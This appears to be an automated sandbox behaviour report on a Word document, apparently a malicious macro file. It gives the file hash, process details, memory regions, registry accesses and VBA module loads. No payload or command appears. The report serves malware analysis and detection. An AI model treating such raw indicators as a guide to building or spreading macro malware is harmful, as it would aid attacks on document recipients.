81f1a5faaa792952e49c477f54c75beec7fd03d3a1c250db2b863ec2b669beee (SHA256)
Dokumente-UOM36417800369487.doc
Word Document
Created at 2018-08-01 10:16:00
Notifications (1/1)
The maximum number of reputation URL requests (10 per analysis) was exceeded. As a result, the reputation status could not be queried for all contacted URLs. In order to get the reputation status for all contacted URLs, please increase the 'Max URL Requests' setting in the system configurations.
Monitored Processes
Behavior Information - Grouped by Category
Process #1: winword.exe
8717
0
| Information | Value |
|---|---|
| ID | #1 |
| File Name | c:\program files\microsoft office\office15\winword.exe |
| Command Line | "C:\Program Files\Microsoft Office\Office15\WINWORD.EXE" /n |
| Initial Working Directory | C:\Users\BGC6u8Oy yXGxkR\Desktop\ |
| Monitor | Start Time: 00:00:48, Reason: Analysis Target |
| Unmonitor | End Time: 00:03:58, Reason: Self Terminated |
| Monitor Duration | 00:03:10 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x9a4 |
| Parent PID | 0x4f8 (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | F71GWAT\BGC6u8Oy yXGxkR |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
9E0
0x
9DC
0x
9D8
0x
9D4
0x
9D0
0x
9CC
0x
9C0
0x
9BC
0x
9B8
0x
9B4
0x
9B0
0x
9A8
0x
A30
0x
A50
0x
AA0
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00043fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000000c0000 | 0x000c0000 | 0x000c0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000d0000 | 0x000d0000 | 0x001cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001d0000 | 0x001d0000 | 0x001d1fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001e0000 | 0x001e0000 | 0x001e1fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001f0000 | 0x001f0000 | 0x002b7fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000002c0000 | 0x002c0000 | 0x002c0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002d0000 | 0x002d0000 | 0x002d0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002e0000 | 0x002e0000 | 0x002effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002f0000 | 0x002f0000 | 0x002fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000300000 | 0x00300000 | 0x00330fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000340000 | 0x00340000 | 0x00341fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000350000 | 0x00350000 | 0x00359fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000000360000 | 0x00360000 | 0x0036ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000000370000 | 0x00370000 | 0x0046ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000470000 | 0x00470000 | 0x00570fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000580000 | 0x00580000 | 0x0059ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000005b0000 | 0x005b0000 | 0x005b1fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000005d0000 | 0x005d0000 | 0x005dffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000005e0000 | 0x005e0000 | 0x006befff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000006c0000 | 0x006c0000 | 0x006cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000700000 | 0x00700000 | 0x00700fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000710000 | 0x00710000 | 0x0080ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000810000 | 0x00810000 | 0x0084ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000008f0000 | 0x008f0000 | 0x008f6fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000900000 | 0x00900000 | 0x00901fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000910000 | 0x00910000 | 0x00910fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000920000 | 0x00920000 | 0x00920fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000930000 | 0x00930000 | 0x00933fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000940000 | 0x00940000 | 0x00940fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000950000 | 0x00950000 | 0x00950fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000960000 | 0x00960000 | 0x00a5ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x00a60000 | 0x00d2efff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000d30000 | 0x00d30000 | 0x00e2ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000e30000 | 0x00e30000 | 0x00e31fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000e40000 | 0x00e40000 | 0x00e4ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000e50000 | 0x00e50000 | 0x00e50fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000e60000 | 0x00e60000 | 0x00e60fff | Pagefile Backed Memory | r |
|
|
|
- |
| msxml6r.dll | 0x00e70000 | 0x00e70fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000e80000 | 0x00e80000 | 0x00e80fff | Pagefile Backed Memory | rw |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000001c.db | 0x00f90000 | 0x00faffff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000fc0000 | 0x00fc0000 | 0x00fc0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000fd0000 | 0x00fd0000 | 0x0100ffff | Private Memory | rw |
|
|
|
- |
| c_1255.nls | 0x01010000 | 0x01020fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000001080000 | 0x01080000 | 0x0108ffff | Private Memory | rw |
|
|
|
- |
| winword.exe | 0x01090000 | 0x01266fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001270000 | 0x01270000 | 0x01e6ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001e90000 | 0x01e90000 | 0x01f8ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001f90000 | 0x01f90000 | 0x02382fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000024d0000 | 0x024d0000 | 0x0254ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002560000 | 0x02560000 | 0x0265ffff | Private Memory | rw |
|
|
|
- |
| kernelbase.dll.mui | 0x02660000 | 0x0271ffff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000002740000 | 0x02740000 | 0x0283ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002840000 | 0x02840000 | 0x02c3ffff | Pagefile Backed Memory | r |
|
|
|
- |
| staticcache.dat | 0x02c40000 | 0x0356ffff | Memory Mapped File | r |
|
|
|
- |
| segoeui.ttf | 0x03570000 | 0x035eefff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000003660000 | 0x03660000 | 0x0366ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003700000 | 0x03700000 | 0x0373ffff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000003780000 | 0x03780000 | 0x0387ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000038a0000 | 0x038a0000 | 0x038affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000038e0000 | 0x038e0000 | 0x0391ffff | Private Memory | rwx |
|
|
|
- |
| pagefile_0x0000000003920000 | 0x03920000 | 0x0411ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000004120000 | 0x04120000 | 0x0421ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004290000 | 0x04290000 | 0x0438ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000043d0000 | 0x043d0000 | 0x044cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000044d0000 | 0x044d0000 | 0x045cffff | Private Memory | rw |
|
|
|
- |
| tahoma.ttf | 0x045d0000 | 0x0467afff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004690000 | 0x04690000 | 0x0478ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004850000 | 0x04850000 | 0x0488ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000048d0000 | 0x048d0000 | 0x049cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000049d0000 | 0x049d0000 | 0x04dcffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000004dd0000 | 0x04dd0000 | 0x04fcffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004fd0000 | 0x04fd0000 | 0x050a0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005150000 | 0x05150000 | 0x0518ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005190000 | 0x05190000 | 0x051cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000051d0000 | 0x051d0000 | 0x055cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000055d0000 | 0x055d0000 | 0x059d0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000059e0000 | 0x059e0000 | 0x05de0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005df0000 | 0x05df0000 | 0x061f0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000006200000 | 0x06200000 | 0x063fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000006400000 | 0x06400000 | 0x067fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000037170000 | 0x37170000 | 0x3717ffff | Private Memory | rwx |
|
|
|
- |
| wwlib.dll | 0x63850000 | 0x64d0bfff | Memory Mapped File | rwx |
|
|
|
- |
| riched20.dll | 0x65290000 | 0x6541dfff | Memory Mapped File | rwx |
|
|
|
- |
| oart.dll | 0x65420000 | 0x661c7fff | Memory Mapped File | rwx |
|
|
|
- |
| dwrite.dll | 0x663a0000 | 0x664a9fff | Memory Mapped File | rwx |
|
|
|
- |
| adal.dll | 0x66500000 | 0x665b4fff | Memory Mapped File | rwx |
|
|
|
- |
| msptls.dll | 0x667e0000 | 0x668f5fff | Memory Mapped File | rwx |
|
|
|
- |
| msores.dll | 0x67300000 | 0x6bfeafff | Memory Mapped File | rwx |
|
|
|
- |
| mso.dll | 0x6bff0000 | 0x6d8d3fff | Memory Mapped File | rwx |
|
|
|
- |
| d3d10warp.dll | 0x6e930000 | 0x6ea5bfff | Memory Mapped File | rwx |
|
|
|
- |
| msointl.dll | 0x6ea60000 | 0x6edd0fff | Memory Mapped File | rwx |
|
|
|
- |
| msxml6.dll | 0x6f100000 | 0x6f257fff | Memory Mapped File | rwx |
|
|
|
- |
| webio.dll | 0x6fd30000 | 0x6fd7efff | Memory Mapped File | rwx |
|
|
|
- |
| winhttp.dll | 0x6fd80000 | 0x6fdd7fff | Memory Mapped File | rwx |
|
|
|
- |
| mscoreei.dll | 0x70980000 | 0x709f9fff | Memory Mapped File | rwx |
|
|
|
- |
| wwintl.dll | 0x70a00000 | 0x70abffff | Memory Mapped File | rwx |
|
|
|
- |
| osppc.dll | 0x70ac0000 | 0x70aecfff | Memory Mapped File | rwx |
|
|
|
- |
| d3d11.dll | 0x70af0000 | 0x70b72fff | Memory Mapped File | rwx |
|
|
|
- |
| d2d1.dll | 0x70b80000 | 0x70c39fff | Memory Mapped File | rwx |
|
|
|
- |
| office.odf | 0x716e0000 | 0x71bdffff | Memory Mapped File | rwx |
|
|
|
- |
| msi.dll | 0x71be0000 | 0x71e1ffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcp100.dll | 0x71e50000 | 0x71eb8fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcr100.dll | 0x71ec0000 | 0x71f7efff | Memory Mapped File | rwx |
|
|
|
- |
| dxgi.dll | 0x723c0000 | 0x72442fff | Memory Mapped File | rwx |
|
|
|
- |
| d3d10_1core.dll | 0x72450000 | 0x72489fff | Memory Mapped File | rwx |
|
|
|
- |
| d3d10_1.dll | 0x72490000 | 0x724bbfff | Memory Mapped File | rwx |
|
|
|
- |
| mscoree.dll | 0x727a0000 | 0x727e9fff | Memory Mapped File | rwx |
|
|
|
- |
| msimg32.dll | 0x729a0000 | 0x729a4fff | Memory Mapped File | rwx |
|
|
|
- |
| winspool.drv | 0x738c0000 | 0x73910fff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x740e0000 | 0x74100fff | Memory Mapped File | rwx |
|
|
|
- |
| wtsapi32.dll | 0x74370000 | 0x7437cfff | Memory Mapped File | rwx |
|
|
|
- |
| windowscodecs.dll | 0x74390000 | 0x7448afff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x744c0000 | 0x744d2fff | Memory Mapped File | rwx |
|
|
|
- |
| gdiplus.dll | 0x74660000 | 0x747effff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x747f0000 | 0x7482ffff | Memory Mapped File | rwx |
|
|
|
- |
| propsys.dll | 0x74830000 | 0x74924fff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74970000 | 0x74b0dfff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x74ee0000 | 0x74ee8fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x75200000 | 0x7523afff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x75460000 | 0x75475fff | Memory Mapped File | rwx |
|
|
|
- |
| secur32.dll | 0x758a0000 | 0x758a7fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x758c0000 | 0x758dafff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x758e0000 | 0x758ebfff | Memory Mapped File | rwx |
|
|
|
- |
| winsta.dll | 0x75950000 | 0x75978fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrtremote.dll | 0x75980000 | 0x7598dfff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x75990000 | 0x7599afff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x75a00000 | 0x75a0bfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75a10000 | 0x75a59fff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x75a60000 | 0x75a86fff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x75a90000 | 0x75bacfff | Memory Mapped File | rwx |
|
|
|
- |
| devobj.dll | 0x75bb0000 | 0x75bc1fff | Memory Mapped File | rwx |
|
|
|
- |
| wintrust.dll | 0x75c60000 | 0x75c8cfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x75c90000 | 0x75d2ffff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x75d30000 | 0x75dfbfff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x75e00000 | 0x75e82fff | Memory Mapped File | rwx |
|
|
|
- |
| urlmon.dll | 0x75e90000 | 0x75fc5fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x75fd0000 | 0x75fe8fff | Memory Mapped File | rwx |
|
|
|
- |
| wldap32.dll | 0x75ff0000 | 0x76034fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76040000 | 0x760ebfff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x760f0000 | 0x76d39fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x76d40000 | 0x76d8dfff | Memory Mapped File | rwx |
|
|
|
- |
| setupapi.dll | 0x76dc0000 | 0x76f5cfff | Memory Mapped File | rwx |
|
|
|
- |
| iertutil.dll | 0x76f70000 | 0x7716afff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77170000 | 0x77238fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x77240000 | 0x772dcfff | Memory Mapped File | rwx |
|
|
|
- |
|
For performance reasons, the remaining 136 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Host Behavior
Registry (48)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\Licenses | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\VBA\Monitors | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.6 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.6\409 | - |
|
2 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.6\9 | - |
|
2 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.6\0 | - |
|
2 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.6\0\win32 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib | - |
|
2 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0 | - |
|
2 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win32 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.7 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.7\0 | - |
|
2 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.7\0\win32 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.6 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.6\0 | - |
|
2 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.6\0\win32 | - |
|
1 | |
| Read Value | HKEY_CLASSES_ROOT\Licenses\8804558B-B773-11d1-BC3E-0000F87552E7 | data = } |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = RequireDeclaration, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = CompileOnDemand, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = NotifyUserBeforeStateLoss, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = BackGroundCompile, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = BreakOnAllErrors, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = BreakOnServerErrors, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.6\0\win32 | data = C:\Program Files\Microsoft Office\Office15\MSWORD.OLB |
|
2 | |
| Read Value | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win32 | data = C:\Windows\system32\stdole2.tlb |
|
1 | |
| Read Value | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.7\0\win32 | data = C:\Program Files\Common Files\Microsoft Shared\OFFICE15\MSO.DLL |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} | - |
|
1 |
Module (220)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL | base_address = 0x670d0000 |
|
1 | |
| Load | C:\PROGRA~1\COMMON~1\MICROS~1\VBA\VBA7.1\1033\VBE7INTL.DLL | base_address = 0x70330000 |
|
1 | |
| Load | OLEAUT32.DLL | base_address = 0x77360000 |
|
1 | |
| Load | VBE7.DLL | base_address = 0x6e530000 |
|
42 | |
| Get Handle | c:\program files\microsoft office\office15\winword.exe | base_address = 0x1090000 |
|
1 | |
| Get Handle | c:\windows\system32\msi.dll | base_address = 0x71be0000 |
|
1 | |
| Get Handle | C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL | base_address = 0x0 |
|
1 | |
| Get Handle | c:\windows\system32\user32.dll | base_address = 0x77170000 |
|
1 | |
| Get Handle | oleaut32.dll | base_address = 0x77360000 |
|
1 | |
| Get Handle | ole32.dll | base_address = 0x77500000 |
|
1 | |
| Get Filename | - | process_name = c:\program files\microsoft office\office15\winword.exe, file_name_orig = C:\PROGRA~1\COMMON~1\MICROS~1\VBA\VBA7.1\VBE7.DLL, size = 260 |
|
4 | |
| Get Address | c:\windows\system32\msi.dll | function = MsiProvideQualifiedComponentA, address_out = 0x71c0c331 |
|
1 | |
| Get Address | c:\windows\system32\msi.dll | function = MsiGetProductCodeA, address_out = 0x71c0ea84 |
|
1 | |
| Get Address | c:\windows\system32\msi.dll | function = MsiReinstallFeatureA, address_out = 0x71c91cf6 |
|
1 | |
| Get Address | c:\windows\system32\msi.dll | function = MsiProvideComponentA, address_out = 0x71c9f5d1 |
|
1 | |
| Get Address | Unknown module name | function = _MsoVBADigSigCallDlg@20, address_out = 0x671ffe80 |
|
1 | |
| Get Address | Unknown module name | function = _MsoVbaInitSecurity@4, address_out = 0x67188951 |
|
1 | |
| Get Address | Unknown module name | function = _MsoFIEPolicyAndVersion@8, address_out = 0x6717cd31 |
|
1 | |
| Get Address | Unknown module name | function = _MsoFAnsiCodePageSupportsLCID@8, address_out = 0x6718882e |
|
1 | |
| Get Address | Unknown module name | function = _MsoFInitOffice@20, address_out = 0x6717cd4b |
|
1 | |
| Get Address | Unknown module name | function = _MsoUninitOffice@4, address_out = 0x671396db |
|
1 | |
| Get Address | Unknown module name | function = _MsoFGetFontSettings@20, address_out = 0x67131af9 |
|
1 | |
| Get Address | Unknown module name | function = _MsoRgchToRgwch@16, address_out = 0x67139bae |
|
1 | |
| Get Address | Unknown module name | function = _MsoHrSimpleQueryInterface@16, address_out = 0x671334e1 |
|
1 | |
| Get Address | Unknown module name | function = _MsoHrSimpleQueryInterface2@20, address_out = 0x67133523 |
|
1 | |
| Get Address | Unknown module name | function = _MsoFCreateControl@36, address_out = 0x67134a26 |
|
1 | |
| Get Address | Unknown module name | function = _MsoFLongLoad@8, address_out = 0x67231250 |
|
1 | |
| Get Address | Unknown module name | function = _MsoFLongSave@8, address_out = 0x67231259 |
|
1 | |
| Get Address | Unknown module name | function = _MsoFGetTooltips@0, address_out = 0x6716dfac |
|
1 | |
| Get Address | Unknown module name | function = _MsoFSetTooltips@4, address_out = 0x67192845 |
|
1 | |
| Get Address | Unknown module name | function = _MsoFLoadToolbarSet@24, address_out = 0x6717dd8b |
|
1 | |
| Get Address | Unknown module name | function = _MsoFCreateToolbarSet@28, address_out = 0x671323c9 |
|
1 | |
| Get Address | Unknown module name | function = _MsoHpalOffice@0, address_out = 0x6713c568 |
|
1 | |
| Get Address | Unknown module name | function = _MsoFWndProcNeeded@4, address_out = 0x671318d2 |
|
1 | |
| Get Address | Unknown module name | function = _MsoFWndProc@24, address_out = 0x67132a70 |
|
1 | |
| Get Address | Unknown module name | function = _MsoFCreateITFCHwnd@20, address_out = 0x67131925 |
|
1 | |
| Get Address | Unknown module name | function = _MsoDestroyITFC@4, address_out = 0x6713958b |
|
1 | |
| Get Address | Unknown module name | function = _MsoFPitbsFromHwndAndMsg@12, address_out = 0x67138820 |
|
1 | |
| Get Address | Unknown module name | function = _MsoFGetComponentManager@4, address_out = 0x671335a4 |
|
1 | |
| Get Address | Unknown module name | function = _MsoMultiByteToWideChar@24, address_out = 0x6713ac03 |
|
2 | |
| Get Address | Unknown module name | function = _MsoWideCharToMultiByte@32, address_out = 0x67134d33 |
|
1 | |
| Get Address | Unknown module name | function = _MsoHrRegisterAll@0, address_out = 0x671ff8b6 |
|
1 | |
| Get Address | Unknown module name | function = _MsoFSetComponentManager@4, address_out = 0x6713c179 |
|
1 | |
| Get Address | Unknown module name | function = _MsoFCreateStdComponentManager@20, address_out = 0x671319d5 |
|
1 | |
| Get Address | Unknown module name | function = _MsoFHandledMessageNeeded@4, address_out = 0x67136736 |
|
1 | |
| Get Address | Unknown module name | function = _MsoPeekMessage@8, address_out = 0x6713649f |
|
1 | |
| Get Address | Unknown module name | function = _MsoFCreateIPref@28, address_out = 0x6712f9cf |
|
1 | |
| Get Address | Unknown module name | function = _MsoDestroyIPref@4, address_out = 0x67139320 |
|
1 | |
| Get Address | Unknown module name | function = _MsoChsFromLid@4, address_out = 0x6712f864 |
|
1 | |
| Get Address | Unknown module name | function = _MsoCpgFromChs@4, address_out = 0x67131cc5 |
|
1 | |
| Get Address | Unknown module name | function = _MsoSetLocale@4, address_out = 0x6712f984 |
|
1 | |
| Get Address | Unknown module name | function = _MsoFSetHMsoinstOfSdm@4, address_out = 0x6713198e |
|
1 | |
| Get Address | Unknown module name | function = _MsoSetVbaInterfaces@8, address_out = 0x671fff8d |
|
1 | |
| Get Address | Unknown module name | function = _MsoGetControlInstanceId@8, address_out = 0x671d86e7 |
|
1 | |
| Get Address | Unknown module name | function = SysFreeString, address_out = 0x77363e59 |
|
1 | |
| Get Address | Unknown module name | function = LoadTypeLib, address_out = 0x77370aa2 |
|
1 | |
| Get Address | Unknown module name | function = RegisterTypeLib, address_out = 0x77381ea6 |
|
1 | |
| Get Address | Unknown module name | function = QueryPathOfRegTypeLib, address_out = 0x7739351b |
|
1 | |
| Get Address | Unknown module name | function = UnRegisterTypeLib, address_out = 0x77391ca9 |
|
2 | |
| Get Address | Unknown module name | function = OleTranslateColor, address_out = 0x773926fa |
|
1 | |
| Get Address | Unknown module name | function = OleCreateFontIndirect, address_out = 0x7738352f |
|
1 | |
| Get Address | Unknown module name | function = OleCreatePictureIndirect, address_out = 0x77383df8 |
|
1 | |
| Get Address | Unknown module name | function = OleLoadPicture, address_out = 0x773c7c49 |
|
1 | |
| Get Address | Unknown module name | function = OleCreatePropertyFrameIndirect, address_out = 0x773c93fc |
|
1 | |
| Get Address | Unknown module name | function = OleCreatePropertyFrame, address_out = 0x773c944a |
|
1 | |
| Get Address | Unknown module name | function = OleIconToCursor, address_out = 0x773c776e |
|
1 | |
| Get Address | Unknown module name | function = LoadTypeLibEx, address_out = 0x773707b7 |
|
2 | |
| Get Address | Unknown module name | function = OleLoadPictureEx, address_out = 0x773c70a1 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = GetSystemMetrics, address_out = 0x771867cf |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = MonitorFromWindow, address_out = 0x77183622 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = MonitorFromRect, address_out = 0x77180ca1 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = MonitorFromPoint, address_out = 0x771794c9 |
|
1 | |
